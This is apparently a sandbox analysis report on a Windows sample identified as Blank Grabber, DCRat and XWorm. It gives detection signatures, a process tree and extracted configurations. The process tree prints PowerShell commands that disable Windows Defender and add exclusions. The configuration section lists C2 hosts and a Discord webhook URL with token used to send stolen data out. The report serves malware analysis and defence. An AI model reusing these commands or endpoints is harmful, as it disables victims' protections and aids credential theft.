Edit tour

Windows Analysis Report
Vjy8d2EoqK.exe

Overview

General Information

Sample name:	Vjy8d2EoqK.exe renamed because original name is a hash value
Original sample name:	A0936899FBF31493BBE5E34DC18A9341.exe
Analysis ID:	1487977
MD5:	a0936899fbf31493bbe5e34dc18a9341
SHA1:	1634a9e1759962db670bf244b1b3f5a9e71a25d7
SHA256:	b27cdbd5705c56034999011911997559d5eecb66e2e0d8b8c9aa843fe05d1627
Tags:	BlankGrabberexe
Infos:

Detection

Blank Grabber, DCRat, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Blank Grabber

Yara detected DCRat

Yara detected Telegram RAT

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Check if machine is in data center or colocation facility

Creates an autostart registry key pointing to binary in C:\Windows

Creates an undocumented autostart registry key

Creates autostart registry keys with suspicious values (likely registry only malware)

Creates multiple autostart registry keys

Creates processes via WMI

Drops PE files with benign system names

Drops executables to the windows directory (C:\Windows) and starts them

Found many strings related to Crypto-Wallets (likely being stolen)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies Windows Defender protection settings

Modifies existing user documents (likely ransomware behavior)

Modifies the hosts file

Protects its processes via BreakOnTermination flag

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Removes signatures from Windows Defender

Sample uses string decryption to hide its real strings

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: Suspicious Startup Folder Persistence

Sigma detected: System File Execution Location Anomaly

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses cmd line tools excessively to alter registry or file data

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Sigma detected: Powershell Defender Exclusion

Sigma detected: SCR File Write Event

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: Suspicious Screensaver Binary File Creation

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Vjy8d2EoqK.exe (PID: 2596 cmdline: "C:\Users\user\Desktop\Vjy8d2EoqK.exe" MD5: A0936899FBF31493BBE5E34DC18A9341)

svchosts.exe (PID: 1436 cmdline: "C:\Users\user\AppData\Local\Temp\svchosts.exe" MD5: 91F72031C3AD088797D77357FA39DB39)

wscript.exe (PID: 7200 cmdline: "C:\Windows\System32\WScript.exe" "C:\Brokercrt\aIVfHknoFLGNu6gLK6xZar0.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 7652 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Brokercrt\oqZ1ERFvWaUzYBP9Lou79Kq.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

comReviewsession.exe (PID: 7476 cmdline: "C:\Brokercrt\comReviewsession.exe" MD5: 24DAFEB85B4C72D29606ADF2A59DA04C)

Conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

S l r .exe (PID: 5768 cmdline: "C:\Users\user\AppData\Local\Temp\S l r .exe" MD5: D69B290766342861CDE3B24BA1ECD0C6)

XClient.exe (PID: 7216 cmdline: "C:\Users\user\AppData\Local\Temp\XClient.exe" MD5: BF19D4A22F47EEA6DD1DB1C98A5AAC07)

powershell.exe (PID: 7848 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SolaraBootstrapper.exe (PID: 7248 cmdline: "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe" MD5: 6557BD5240397F026E675AFB78544A26)

conhost.exe (PID: 7264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Built.exe (PID: 6496 cmdline: "C:\Users\user\AppData\Local\Temp\Built.exe" MD5: EC729E4911261337E4CA4E9FC77F942B)

Built.exe (PID: 6252 cmdline: "C:\Users\user\AppData\Local\Temp\Built.exe" MD5: EC729E4911261337E4CA4E9FC77F942B)

cmd.exe (PID: 7372 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7564 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7380 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7552 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7400 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7596 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7428 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7620 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7976 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 8032 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 8052 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 8108 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 8148 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 4192 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 2656 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 5956 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7980 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7452 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)

Conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7704 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7624 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 8120 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 1396 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7204 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7768 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

dasHost.exe (PID: 7324 cmdline: C:\Windows\SysWOW64\it-IT\dasHost.exe MD5: 24DAFEB85B4C72D29606ADF2A59DA04C)

dasHost.exe (PID: 8064 cmdline: C:\Windows\SysWOW64\it-IT\dasHost.exe MD5: 24DAFEB85B4C72D29606ADF2A59DA04C)

dwm.exe (PID: 8060 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe" MD5: 24DAFEB85B4C72D29606ADF2A59DA04C)

iKSiRODBDWoPAMSDKBDQBFN.exe (PID: 7568 cmdline: "C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe" MD5: 24DAFEB85B4C72D29606ADF2A59DA04C)

iKSiRODBDWoPAMSDKBDQBFN.exe (PID: 7776 cmdline: "C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe" MD5: 24DAFEB85B4C72D29606ADF2A59DA04C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["cash-spoken.gl.at.ply.gg"], "Port": "27573", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}

Threatname: DCRat

{"SCRT": "{\"L\":\"*\",\"X\":\"~\",\"S\":\",\",\"W\":\"(\",\"d\":\"@\",\"A\":\"$\",\"M\":\"<\",\"j\":\"`\",\"h\":\"|\",\"Q\":\"#\",\"w\":\"-\",\"9\":\")\",\"C\":\";\",\"4\":\" \",\"H\":\"!\",\"B\":\"%\",\"0\":\"^\",\"y\":\"&\",\"3\":\">\",\"J\":\".\",\"5\":\"_\"}", "PCRT": "{\"f\":\"$\",\"6\":\".\",\"S\":\"-\",\"Q\":\"~\",\"c\":\"`\",\"i\":\"^\",\"b\":\"_\",\"M\":\"(\",\"w\":\"<\",\"e\":\">\",\"j\":\")\",\"l\":\"&\",\"I\":\" \",\"=\":\"#\",\"y\":\";\",\"X\":\",\",\"D\":\"!\",\"p\":\"%\",\"0\":\"*\",\"x\":\"|\"}", "TAG": "", "MUTEX": "DCR_MUTEX-8bX0OVuOnvbm27qz2KER", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": null, "AS": false, "ASO": false, "AD": false, "H1": "http://a1009150.xsph.ru/@==gbJBzYuFDT", "H2": "http://a1009150.xsph.ru/@==gbJBzYuFDT", "T": "0"}

Threatname: Blank Grabber

{"C2 url": "https://discordapp.com/api/webhooks/1255594789861195827/8s6rt3E8edVCsvsaavUpcA9mRxd3KM7eS7ju4bkPhLPkUvlnCQyyUrBISoboFGoSAAiq"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Vjy8d2EoqK.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Vjy8d2EoqK.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x80357e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x80361b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x803730:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x802ecc:$cnc4: POST / HTTP/1.1

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\XClient.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Roaming\XClient.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xbbca:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xbc67:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xbd7c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xb518:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\Temp\_MEI64962\rarreg.key	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
C:\Users\user\AppData\Local\Temp\XClient.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Local\Temp\XClient.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xbbca:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xbc67:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xbd7c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xb518:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\Temp\S l r .exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Local\Temp\S l r .exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xe05e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xe0fb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xe210:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xd9ac:$cnc4: POST / HTTP/1.1
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xd056:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2006e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xd0f3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2010b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xd208:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x20220:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xc9a4:$cnc4: POST / HTTP/1.1 0x1f9bc:$cnc4: POST / HTTP/1.1
00000001.00000003.1694117012.0000021AFD7E2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000039.00000002.2145328378.0000000002852000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000037.00000002.2144420087.00000000031E2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000001.00000003.1694117012.0000021AFD7E4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000033.00000002.2143786130.00000000031C5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xbe5e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xbefb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xc010:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xb7ac:$cnc4: POST / HTTP/1.1
00000003.00000003.2039099236.000001D5E543D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2029505952.000001D5E6183000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000003.00000003.2035836310.000001D5E542F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000004.00000003.1709553123.000000000055D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000004.00000003.1709553123.000000000055D000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xb42a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x18a42:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xb4c7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x18adf:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xb5dc:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x18bf4:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xad78:$cnc4: POST / HTTP/1.1 0x18390:$cnc4: POST / HTTP/1.1
00000033.00000002.2143786130.0000000003202000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000000.1682604318.0000000000408000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000000.1682604318.0000000000408000.00000002.00000001.01000000.00000003.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x80237e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x80241b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x802530:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x801ccc:$cnc4: POST / HTTP/1.1
00000033.00000002.2143786130.00000000031FD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000003.00000003.2038832287.000001D5E5438000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000003.00000002.2050287577.000001D5E543E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000006.00000000.1709097022.0000000000D72000.00000002.00000001.01000000.0000000F.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000006.00000000.1709097022.0000000000D72000.00000002.00000001.01000000.0000000F.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xb9ca:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xba67:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xbb7c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xb318:$cnc4: POST / HTTP/1.1
00000026.00000002.1871672428.00000000035BD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000034.00000002.2132843674.0000000002412000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000039.00000002.2145328378.0000000002801000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000003B.00000002.2149228048.0000000002D70000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000037.00000002.2144420087.0000000003191000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000003B.00000002.2149228048.0000000002D38000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
